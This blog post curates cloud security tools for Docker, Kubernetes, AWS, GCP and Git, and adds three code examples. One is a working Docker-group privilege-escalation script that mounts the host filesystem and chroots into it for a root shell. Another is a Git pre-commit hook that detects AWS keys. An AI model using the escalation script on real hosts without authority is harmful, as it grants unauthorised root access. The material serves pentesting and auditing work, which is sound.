My Arsenal of Cloud Native (Security) Tools
A while ago I posted “So I Heard You Want to Learn Kubernetes” (part of the “Kubernetes Primer for Security Professionals” series), where I tried to dispel the perception that Kubernetes is too hard to even get started with, by walking through the journey I took to learn the basics first and to focus on its security aspects later.
The natural next step was to put those concepts into practice, but I quickly realized there was a shortage of resources giving a comprehensive overview of (offensive) security tooling for that space. As with many topics in this industry, the information is scattered and non-uniform.
@ToniBlyx, in his post “My arsenal of AWS security tools”, gave it a go. That post was indeed the starting point for this one, but I felt the need to personalize that list and to add tools not only for AWS, but also for Docker, Kubernetes, and even Git.
In this post I’ll focus on providing a curated list of tools I personally find useful, alongside a quick “usage” guide for each one of them. I’ve also released an Ansible role for those who want to quickly deploy them.
An Ansible role for (some of) the tools listed in this article can be found on Github: https://github.com/marco-lancini/utils/tree/main/ansible/roles/kali-cloud.
- 20 December 2018: added a new auditing tool for Kubernetes (KubiScan).
- 24 January 2019 and 4 March 2019: added tools for Google Cloud Platform (GCP).
- 2 May 2019: added one new auditing tool for Docker (dive), and two for Kubernetes (kubeaudit, kubesec).
Docker
Auditing Tools
Name | Description |
---|---|
Docker Bench | Checks for common best practices around deploying Docker containers in production. Based on the CIS Docker Community Edition Benchmark v1.1.0. |
Clair | Static analysis of Docker images for known security vulnerabilities. I personally found it not straightforward to set up, so I ended up creating my own docker-compose to spin up Clair alongside Postgres and Klar. |
Dockscan | Scans Docker installations for security issues and vulnerabilities. |
dive | Explores each layer of a Docker image, showing what every layer adds or changes. |
Privilege Escalation
Name | Description |
---|---|
dockerrootplease | Gives you root on the host OS if you are a member of the "docker" group. |
docker-rootshell | Abuses membership in the "docker" group to drop a root shell in the current working directory. |
docker-escalate | Same concept as above. |
Manual | The same escalation performed by hand with plain docker commands, without a helper script. |
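The escalation the three tools above automate, as an added example (this is not code from the original post or from any of those projects): membership in the "docker" group lets a user ask the root-owned daemon to bind-mount the host's root filesystem into a container, so a chroot into that mount is a root shell on the host. The script first performs the two checks a pentester wants before trying it (group membership and socket access). It assumes a Linux host with the Docker CLI and a reachable daemon; the `alpine` image and the `--run` flag are choices made for this example.

```shell
#!/bin/sh
# Added example, not code from the original post or from dockerrootplease,
# docker-rootshell or docker-escalate: the manual "docker group" escalation
# those tools automate. Assumes a Linux host with the Docker CLI installed
# and a reachable Docker daemon.
set -eu

# Return 0 if the space-separated group list (the format printed by `id -nG`)
# contains the docker group, 1 otherwise.
in_docker_group() {
  for g in $1; do
    [ "$g" = "docker" ] && return 0
  done
  return 1
}

# Return 0 if the Docker socket exists and the caller can write to it.
# Write access to the socket is the real capability; group membership is
# just the usual way of obtaining it.
socket_writable() {
  sock="${1:-/var/run/docker.sock}"
  [ -S "$sock" ] && [ -w "$sock" ]
}

# Start a throwaway container with the host's root filesystem bind-mounted
# at /host and chroot into it. Every command in that shell runs as root on
# the host, because the daemon (running as root) performs the mount.
host_root_shell() {
  docker run --rm -it -v /:/host alpine chroot /host /bin/sh
}

main() {
  if ! in_docker_group "$(id -nG)"; then
    echo "current user is not in the docker group; nothing to escalate with" >&2
    return 1
  fi
  if ! socket_writable; then
    echo "/var/run/docker.sock is not writable by this user" >&2
    return 1
  fi
  host_root_shell
}

# Only escalate when explicitly asked, so the checks can be sourced on their own.
if [ "${1:-}" = "--run" ]; then
  main
fi
```

Run it with `--run` to get the shell. On the defensive side, the same two checks are what Docker Bench flags (the CIS benchmark's "only trusted users are allowed to control the Docker daemon" control): anyone in the docker group, or anyone who can write to the socket, should be treated as root on that host.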
Kubernetes
Auditing Tools
Name | Description |
---|---|
kube-bench | Checks whether Kubernetes is deployed according to security best practices. Based on the CIS Kubernetes Benchmark. |
kube-hunter | Hunts for security weaknesses in Kubernetes clusters, including remote ones. |
KubiScan | Scans for risky permissions and users in the Kubernetes Role-Based Access Control (RBAC) model. It can detect accounts that would expose the whole cluster if their credentials (JWT token, certificate, etc.) were compromised by an attacker. |
kubeaudit | Audits clusters against common security controls. |
kubesec | Quantifies risk for Kubernetes resources. |
kube-auto-analyzer | Configuration analyzer that automates the review of Kubernetes installations against the CIS Kubernetes Benchmark. |
AWS
Basic Tools
Name | Description |
---|---|
aws-cli | Universal command line interface for AWS; most of the tools below depend on it. |
aws-shell | Interactive shell for AWS, with autocompletion and other conveniences. |
Inventory Tools
Name | Description |
---|---|
aws-inventory | Makes an inventory of all your resources across regions. |
Resource Counter | Counts the number of resources per category across regions. |
aws_public_ips | Fetches all public IP addresses tied to your AWS account. |
Auditing Tools
Name | Description |
---|---|
CS-Suite | Audits the security posture of AWS/GCP/Azure infrastructure. Bundles Scout2, Prowler, AWS Trusted Advisor, etc. Permissions required: SecurityAudit |
CloudSploit | Returns a series of potential misconfigurations and security risks. Permissions required: SecurityAudit |
AWS Security Benchmark | Script to evaluate your AWS account against the full CIS Amazon Web Services Foundations Benchmark 1.1. |
S3Scan | Generates a report of all S3 buckets and their permissions (authenticated). |
CloudMapper | Analyzes AWS environments by creating network diagrams (and more). Permissions required: ReadOnlyAccess, SecurityAudit |
PMapper | Advanced and automated AWS IAM evaluation. Permissions required: ReadOnlyAccess |
Scout2 | Security auditing. Already included in CS-Suite. Permissions required: ReadOnlyAccess, SecurityAudit |
Prowler | CIS benchmarks and additional checks for security best practices in AWS. Already included in CS-Suite. Permissions required: SecurityAudit |
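Every tool in the table above names the permissions it needs, and all of them are read-only. The following is an added example (not from the original post or any of the tools) of giving the tools exactly that and nothing more: a dedicated IAM role carrying only the AWS-managed SecurityAudit and ReadOnlyAccess policies, assumable by one principal, with short-lived credentials exported for the tools to pick up. It assumes a configured aws-cli with rights to manage IAM; ACCOUNT_ID, TRUSTED_PRINCIPAL and ROLE_NAME are placeholders to override.

```shell
#!/bin/sh
# Added example, not from the original post: a least-privilege IAM role for
# running the auditing tools above, carrying only the AWS-managed
# SecurityAudit and ReadOnlyAccess policies they list as required.
# Assumptions: aws-cli is configured with credentials allowed to manage IAM;
# ACCOUNT_ID, TRUSTED_PRINCIPAL and ROLE_NAME below are placeholders.
set -eu

ACCOUNT_ID="${ACCOUNT_ID:-123456789012}"
ROLE_NAME="${ROLE_NAME:-cloud-audit}"
TRUSTED_PRINCIPAL="${TRUSTED_PRINCIPAL:-arn:aws:iam::${ACCOUNT_ID}:user/auditor}"

# Trust policy allowing only the given principal to assume the role.
trust_policy() {
  printf '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"%s"},"Action":"sts:AssumeRole"}]}' "$1"
}

# ARN of an AWS-managed policy, given its name.
managed_policy_arn() {
  printf 'arn:aws:iam::aws:policy/%s' "$1"
}

# Create the role and attach the two read-only policies; no write access.
create_audit_role() {
  aws iam create-role --role-name "$ROLE_NAME" \
    --assume-role-policy-document "$(trust_policy "$TRUSTED_PRINCIPAL")"
  for p in SecurityAudit ReadOnlyAccess; do
    aws iam attach-role-policy --role-name "$ROLE_NAME" \
      --policy-arn "$(managed_policy_arn "$p")"
  done
}

# Assume the role, export the temporary credentials into the environment
# (where aws-cli and the tools built on it read them), and confirm which
# identity the tools will run as.
assume_audit_role() {
  set -- $(aws sts assume-role \
    --role-arn "arn:aws:iam::${ACCOUNT_ID}:role/${ROLE_NAME}" \
    --role-session-name audit \
    --query 'Credentials.[AccessKeyId,SecretAccessKey,SessionToken]' \
    --output text)
  export AWS_ACCESS_KEY_ID="$1" AWS_SECRET_ACCESS_KEY="$2" AWS_SESSION_TOKEN="$3"
  aws sts get-caller-identity
}

case "${1:-}" in
  create) create_audit_role ;;
esac
```

Run `sh audit-role.sh create` once as an administrator. Before each audit, source the file and call `assume_audit_role` in the current shell so the exported variables survive; `get-caller-identity` at the end is the check that the tools are about to run as the audit role and not as whatever credentials happened to be lying in `~/.aws`.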
Offensive Tools
Name | Description |
---|---|
Pacu | AWS penetration testing toolkit, designed for offensive security testing against cloud environments. Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, etc. |
Nimbostratus | Tools for fingerprinting and exploiting Amazon cloud infrastructures. |
weirdAAL | AWS Attack Library. |
S3Scanner | Scans for open AWS S3 buckets and dumps their contents. |
Cloudjack | Assesses AWS accounts for subdomain hijacking vulnerabilities caused by decoupled Route53 and CloudFront configurations. |
AWS PWN | A collection of AWS penetration testing scripts. |
Training Apps
Name | Description |
---|---|
flAWS | Challenge that, through a series of levels, teaches common mistakes and gotchas when using AWS. It also provides some "public" credentials you can use to try your tools against. |
Cloudgoat | Vulnerable-by-design AWS infrastructure setup tool. Some writeups are also available. |
DVCA | Damn Vulnerable Cloud Application. |
nimbostratus-target | A target infrastructure you can deploy for testing Nimbostratus. |
GCP
Basic Tools
Name | Description |
---|---|
gcloud | Command line interface for GCP. |
Auditing Tools
Name | Description |
---|---|
G-Scout | Audits GCP configurations. Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer |
ScoutSuite | Multi-cloud security auditing tool. Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer |
gcp-audit | Takes a set of projects and audits them for common issues as defined by its ruleset. |
gcp-iam-collector | Python script for collecting and visualising Google Cloud Platform IAM permissions. |
CS-Suite | Audits the security posture of AWS/GCP/Azure infrastructure. Can be skipped for GCP, since it relies on G-Scout. Permissions required on the projects: Viewer, Security Reviewer, Stackdriver Account Viewer |
Offensive Tools
Name | Description |
---|---|
GCPBucketBrute | Enumerates Google Storage buckets, determines what access you have to them, and checks whether that access can be escalated. |
GIT
Name | Description |
---|---|
git-secrets | Prevents you from committing secrets and credentials into git repositories. |
Gitrob | Reconnaissance tool for GitHub organizations. |
Gitleaks | Searches the full repository history for secrets and keys. |
TruffleHog | Searches git repositories for high-entropy strings and secrets. |
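What git-secrets does when you run `git secrets --register-aws`, as an added example (not the git-secrets code itself and not from the original post): a pre-commit hook that scans only the lines being added by the staged changes, matches the AWS access key ID format, and allow-lists values that look like keys but are not secrets. The regular expression, the allow-list and the constructed test strings are this example's own; it assumes POSIX sh and `grep -E`.

```shell
#!/bin/sh
# Added example, not the git-secrets code itself: a minimal pre-commit hook
# that refuses commits whose added lines contain an AWS access key ID, the
# core of what git-secrets does with `git secrets --register-aws`.
# Assumptions: POSIX sh and grep; the pattern and allow-list are illustrative.
set -eu

# AWS access key IDs are 20 characters: a four-letter prefix followed by 16
# upper-case alphanumerics. Only the two most common prefixes are matched.
AWS_KEY_RE='(AKIA|ASIA)[0-9A-Z]{16}'

# Values that match the pattern but are not secrets (AWS's documentation
# example key), mirroring `git secrets --add --allowed`.
ALLOWED_RE='AKIAIOSFODNN7EXAMPLE'

# Read lines from stdin; print offending lines to stderr and return 1 if any
# non-allow-listed key is present, otherwise return 0.
find_aws_keys() {
  hits=$(grep -E "$AWS_KEY_RE" | grep -v -E "$ALLOWED_RE" || true)
  if [ -n "$hits" ]; then
    printf '[pre-commit] AWS access key ID found in staged changes:\n%s\n' "$hits" >&2
    return 1
  fi
  return 0
}

# Scan only the lines the staged changes add (the diff's "+" lines, minus
# the "+++" file header), so pre-existing findings do not block every commit.
scan_staged() {
  git diff --cached -U0 | grep '^+' | grep -v '^+++' | find_aws_keys
}

# git runs hooks by path with no arguments: scan when installed as the
# pre-commit hook, otherwise only define the functions.
case "$0" in
  */pre-commit) scan_staged ;;
esac
```

Install it by copying the file to `.git/hooks/pre-commit` and making it executable; a non-zero exit from the hook aborts the commit. A hook like this only protects the history going forward, which is why Gitleaks and TruffleHog, which walk the existing history, still belong in the list.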